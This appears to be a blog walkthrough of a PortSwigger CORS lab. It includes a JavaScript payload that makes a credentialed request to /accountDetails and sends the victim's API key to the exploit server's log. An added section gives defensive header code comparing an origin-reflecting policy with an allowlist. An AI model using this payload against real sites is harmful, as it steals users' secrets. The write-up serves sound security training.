Portswigger’s Cross-Origin Resource Sharing Lab Simple Solution | Karthikeyan Nagaraj
Lab Description:
- This website has an insecure CORS configuration in that it trusts all origins.
- To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server.
- The lab is solved when you successfully submit the administrator’s API key.
- You can log in to your own account using the following credentials: wiener:peter
Analysis:
1. Turn your proxy on and turn Intercept off.
2. Log in with the credentials wiener:peter.
3. In the Proxy tab, click HTTP history and look at the /accountDetails request.
4. Observe that your key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials header suggesting that it may support CORS.
5. Now go to the exploit server and enter the following payload, replacing YOUR_LAB_ID with your lab ID:
<script>
// Request the victim's account details with their session cookie attached
var xhr = new XMLHttpRequest();
var url = "https://YOUR_LAB_ID.web-security-academy.net";
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        // Send the response body to the exploit server's log
        fetch("/log?key=" + xhr.responseText);
    }
};
xhr.open('GET', url + "/accountDetails", true);
xhr.withCredentials = true;
xhr.send(null);
</script>
6. View the exploit, then deliver it to the victim.
7. You will now get the victim's API key. Submit the key as the solution to solve the lab.
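Why the payload works, and what the fix looks like, as an added example that is not part of the original write-up or the lab's code: a credentialed cross-origin read only succeeds when Access-Control-Allow-Origin equals the requesting origin exactly and Access-Control-Allow-Credentials is true, so a server that "trusts all origins" is one that echoes the Origin header back. The function names and the app.example.com / untrusted.example origins are assumptions made for illustration.

```javascript
// Header logic only (no HTTP server), so it runs offline. All names are hypothetical.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]); // constructed allowlist

// Weak policy: echoes whatever Origin the browser sends and allows credentials.
function reflectingCors(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened policy: exact-match allowlist. Vary: Origin keeps shared caches
// from serving one origin's CORS headers to another.
function allowlistCors(origin, allowed = ALLOWED_ORIGINS) {
  const headers = { "Vary": "Origin" };
  if (origin && allowed.has(origin)) {
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// Mirrors the browser's rule for a request sent with withCredentials = true:
// "*" is never accepted, and the allowed origin must match exactly.
function credentialedReadAllowed(headers, probeOrigin) {
  return headers["Access-Control-Allow-Origin"] === probeOrigin &&
         headers["Access-Control-Allow-Credentials"] === "true";
}

// Audit helper: which of the probe origins could read a credentialed response?
function audit(policy, probeOrigins) {
  return probeOrigins.filter((o) => credentialedReadAllowed(policy(o), o));
}

const probes = ["https://app.example.com", "https://untrusted.example"]; // constructed
console.log("reflecting:", audit(reflectingCors, probes));
console.log("allowlist: ", audit(allowlistCors, probes));
```

The same check applies when reviewing the /accountDetails response in HTTP history: if the Access-Control-Allow-Origin value changes to match whatever Origin the request carried, the endpoint has the weak policy.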